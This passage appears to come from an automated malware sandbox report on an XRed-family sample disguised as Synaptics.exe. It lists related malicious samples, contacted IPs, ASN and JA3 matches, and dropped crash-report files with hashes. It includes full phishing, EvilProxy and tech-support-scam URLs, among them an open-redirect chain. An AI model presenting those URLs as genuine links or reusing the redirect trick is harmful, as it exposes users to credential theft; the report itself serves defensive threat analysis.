                                                                                        Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                        • 69.42.215.252
                                                                                        System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        P4.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                        • 69.42.215.252
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                                                        • 69.42.215.252
                                                                                        lFsYXvJPWw.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUShttps://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.63
                                                                                        Sweet Group.emlGet hashmaliciousUnknownBrowse
                                                                                        • 52.98.61.50
                                                                                        https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 20.90.131.0
                                                                                        https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 20.90.131.0
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        FW_ _Reminder_ Membership Credit Verification - TPIS Industrial Services_ LLC.msgGet hashmaliciousUnknownBrowse
                                                                                        • 52.109.28.47
                                                                                        https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.42.14
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                        • 20.233.83.145
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 13.107.246.63
                                                                                        AWKNET-LLCUSSynaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                        • 69.42.215.252
                                                                                        System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        P4.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                        • 69.42.215.252
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 69.42.215.252
                                                                                        9BXz5oZUMh.elfGet hashmaliciousUnknownBrowse
                                                                                        • 67.220.95.213
                                                                                        Vxy5RbbhIU.elfGet hashmaliciousUnknownBrowse
                                                                                        • 67.220.95.213

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        28a2c9bd18a11de089ef85a160da29e4https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.63
                                                                                        https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 13.107.246.63
                                                                                        17334181261974bf64e3aa3bbac8bf525f91f1e7e877c7dc9d79fa20f782fc960f960876a5125.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 13.107.246.63
                                                                                        1733418140de6eff55fb568a29814debaf3ad46ee7119730b1019aa5b47c07d232cf03fefd427.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                                                                                        • 13.107.246.63
                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        PHuHRcCpaJ.exeGet hashmaliciousLummaCBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        EI0WLvSYFS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 13.107.246.63
                                                                                        37f463bf4616ecd445d4a1937da06e19Setup.exeGet hashmaliciousVidarBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        Setup.exeGet hashmaliciousVidarBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        DKfcEFnBtm.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        vj3dH1vmYe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        NIsNyN2CTq.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        TPDKSYfEac.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        YQbn27ZkYY.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        FWAvf7mctB.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129
                                                                                        3FodBfenJs.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.19.238
                                                                                        • 142.250.181.129

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):118
                                                                                        Entropy (8bit):3.5700810731231707
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                        MD5:573220372DA4ED487441611079B623CD
                                                                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_43f0d137c6219254dfc5cf5a3d23f6d1d32ca47_455b7b6e_365350a5-963b-4015-8427-0ff55e835ee1\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.2166317896137713
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:6xZVpsCImg0BU/3DzJDzqjICB4HpOe1IzuiFyZ24IO8EKDzy:WyCRBU/3JqjIyFzuiFyY4IO8zy
                                                                                        MD5:F2AA287FD9C5C5BE735136F7802C8358
                                                                                        SHA1:1A48FEF5AC705056FBE537F30F511DC65F00A1F9
                                                                                        SHA-256:9E9A3993C915A697CCCE9A7E5A4C69219B5F4E18349794A988B97BE96FB580F2
                                                                                        SHA-512:1449DC85AA349FE986A5E2A53FF5514704AED2C2F713D73D859D23087A2982B5C28A06E1AE2FF21BB7071E33FC3CA3F7AE320093D8F8CC455E34DC4D09FC3192
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.9.0.9.0.5.2.8.6.8.8.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.9.0.9.0.5.8.8.8.4.4.5.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.5.3.5.0.a.5.-.9.6.3.b.-.4.0.1.5.-.8.4.2.7.-.0.f.f.5.5.e.8.3.5.e.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.8.b.c.3.7.7.-.5.2.3.e.-.4.a.b.e.-.b.0.6.a.-.5.f.6.e.1.d.b.5.f.9.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.8.4.-.0.0.0.1.-.0.0.1.4.-.3.4.e.d.-.c.a.a.0.5.f.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.a.8.0.2.f.2.3.3.8.9.0.1.9.8.3.6.5.c.3.2.7.3.d.e.f.1.5.3.9.9.f.0.7.4.6.1.0.c.5.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_ace1313b643a5d083434cea8e6428dfa37df048_455b7b6e_65defd3e-99d8-47e2-97a8-a54b4277c1dd\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.2164474895621429
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:v9tGZVpsXImE0jM3ODzJDzqjICB4HpOe1IzuiFyZ24IO8EKDzy:Ft8yXFjM3OJqjIyFzuiFyY4IO8zy
                                                                                        MD5:1D7AA66AD96CBA0D6E68D8EEA1E605EB
                                                                                        SHA1:1C6F36274987ACE6DB60CADC207E0ACF94FA22CC
                                                                                        SHA-256:F55024DB9463FA3F5262DF6A0F1C013C5D7C6CDE057B856DB7F2569E9A01A1D5
                                                                                        SHA-512:6192A72B37EAD0A005B950F0D4F9291484DA697F946CFF899C52E9951BBE12E9E290994F4A6FD31544C32DA7E1CB878C830AB38D189FBBC534550A8910FB2EDB
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.9.0.9.0.6.4.2.6.4.5.8.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.9.0.9.0.7.4.3.8.9.5.6.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.d.e.f.d.3.e.-.9.9.d.8.-.4.7.e.2.-.9.7.a.8.-.a.5.4.b.4.2.7.7.c.1.d.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.8.3.3.8.c.1.-.7.3.a.6.-.4.5.7.c.-.a.a.e.1.-.9.a.0.c.7.9.0.e.7.e.7.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.8.4.-.0.0.0.1.-.0.0.1.4.-.3.4.e.d.-.c.a.a.0.5.f.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.a.8.0.2.f.2.3.3.8.9.0.1.9.8.3.6.5.c.3.2.7.3.d.e.f.1.5.3.9.9.f.0.7.4.6.1.0.c.5.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_ae71bdbd-1dbd-4019-a00d-211278b71737\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.2164665219262554
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:upZVpswI40WbkODzJDzqjICB4HpOe1IzuiFrZ24IO8EKDzyA:6ywWWbkOJqjIyFzuiFrY4IO8zyA
                                                                                        MD5:6AB6A8F1CDB6612ED71589533FA5EF8E
                                                                                        SHA1:4246B5A548763E5ECD3F84AAC49DFF5B3C3BC7B4
                                                                                        SHA-256:048156AAB65E984AED12EBB2F2E71792ED081EA91E5D7135E64629C771CA7A9E
                                                                                        SHA-512:F6E0A311089FC5375D478DD2E25DEF83B195BA7FC359D1097148B54395B69D21DFBC728AD1A81AE3F8EC2214079B67DD0D4F935286EAC8DAE73C71B28C62871D
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.9.0.9.0.8.0.1.8.9.1.5.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.9.0.9.0.8.5.6.2.6.6.6.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.7.1.b.d.b.d.-.1.d.b.d.-.4.0.1.9.-.a.0.0.d.-.2.1.1.2.7.8.b.7.1.7.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.0.4.a.d.5.8.-.b.9.2.4.-.4.7.7.9.-.9.2.f.6.-.b.d.e.5.6.9.2.d.c.3.4.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.8.4.-.0.0.0.1.-.0.0.1.4.-.3.4.e.d.-.c.a.a.0.5.f.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.a.8.0.2.f.2.3.3.8.9.0.1.9.8.3.6.5.c.3.2.7.3.d.e.f.1.5.3.9.9.f.0.7.4.6.1.0.c.5.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER10E.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4572
                                                                                        Entropy (8bit):4.439164345970838
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZ0Jg77aI9ZbSWpW8VYCPYm8M4JFWFA2+q84cNZad:uIjfMI7fbz7VjSJd2KNZad
                                                                                        MD5:2593ED39B4C400C0D9F06508350814ED
                                                                                        SHA1:A7487AA4B4F90CCD2AF290DE03A60DBE47425519
                                                                                        SHA-256:BB60EDE0BF58530B249454110F6BA7A608D6C52AC31C623980B74B5F1799A77F
                                                                                        SHA-512:699D04A00C7DEE329D6358DE0726557794756F405A3BB6FB27B48295E4D0098FAA5FF0D547B322506573C6A91707A97AA7AE60A77B27569A777FB740480ABEE2
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618533" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1928.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Dec 5 21:51:22 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):171364
                                                                                        Entropy (8bit):2.70292092687816
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:FJMyqPzAkvXGH8FWAb4P3utiDGZ1Uumx8c:33qdvWH8AA/XUwc
                                                                                        MD5:80829A3D6A725C171BD17936B19E58B8
                                                                                        SHA1:15E7040D0607AEB3B77F304D6EAD338BD1B2ED08
                                                                                        SHA-256:032B1A97673731D09B1928B8DDD8CF571E03C727B290FB21D45C143C16D48620
                                                                                        SHA-512:C9F57440DF9D91212F7C78BB097F3274AE95266BABF8A100489FE4BDDD0A7B29713278079556BCDF4355AC747D5A2319874DBAF4D1FB894AC13DC18F436FDA28
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......Z Rg............4...........$%..H.......$...l,......$....;..........`.......8...........T............S..|I...........,..........|...............................................................................eJ......./......GenuineIntel............T............ Rg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2138.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6328
                                                                                        Entropy (8bit):3.6945850098844057
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJqxB6yK+QOMYirJk2pD789bXJsf0edm:R6lXJM6P+QOMYGJkvXif8
                                                                                        MD5:169770B85E850443EDC5FFBBA938BF33
                                                                                        SHA1:4F39966760DCEC98A27E3E749EE9B5CEAACC9ED6
                                                                                        SHA-256:F073651071A90C41B05EC9D20899CE2D0244DFF842D89ACFEE8E29E5EE983224
                                                                                        SHA-512:30A55B2BCE363B488593C16A56D81B387BB7123E706A2E90CF4D972C6DC6346E9EB05B011015329D22393B9FE42F1A2107C11CAF4AF3561858556DC60097B553
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.8.0.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER21E5.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4580
                                                                                        Entropy (8bit):4.442963570153906
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZJJg77aI9ZbSWpW8VYaYm8M4JFFFE+q8ZiNZad:uIjfxI7fbz7VmJWHNZad
                                                                                        MD5:E9DD252DD106997CBD506FE97563D89E
                                                                                        SHA1:9C6F894218B708BB46B3B393EF02E42F17DBDB4D
                                                                                        SHA-256:B3C777FBF3E8A63E617865D5B62CBA4400D5404110245C00D485FBB806867060
                                                                                        SHA-512:589124C813D16F399E7046A48E0A9C7929674E52C863995DB1E92D45B994B32A1C7EC8AB6C4EFA5A0D58EE6BC7FE363C8D0B99FC92535C2B9EF3D888A44D2B7A
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618534" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERADFB.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 21:50:54 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):3915098
                                                                                        Entropy (8bit):2.3399218835300455
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:wrzS/OUNt6ihz8xFKiCZFUvobSI+ml2qzMZOHZPm4:wOOUNYY8jfjvQ+mY
                                                                                        MD5:4E892967B4DF036D18D66978D3A1390A
                                                                                        SHA1:5CD8DCF29C4BEE0AEAFECDB79B883E8444D9F1AC
                                                                                        SHA-256:7D60FB497ED8FFF0ADE9D5EF48CC2327E237DB7FAF86A8F11A4F808E775DA9B0
                                                                                        SHA-512:D2C1AA20824FDA4D945C149F0D8D2F0BC9D4281AE183C89CFA587748B197351D0BEF665AB4897276026C6A10B2A181D1BF2B1026304B914977C60EFBDCC168F4
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......> Rg.............S..........$%...Z......$................n..........`.......8...........T........... ...:.9....................................................................................................eJ..............GenuineIntel............T............ Rg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4A1.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6318
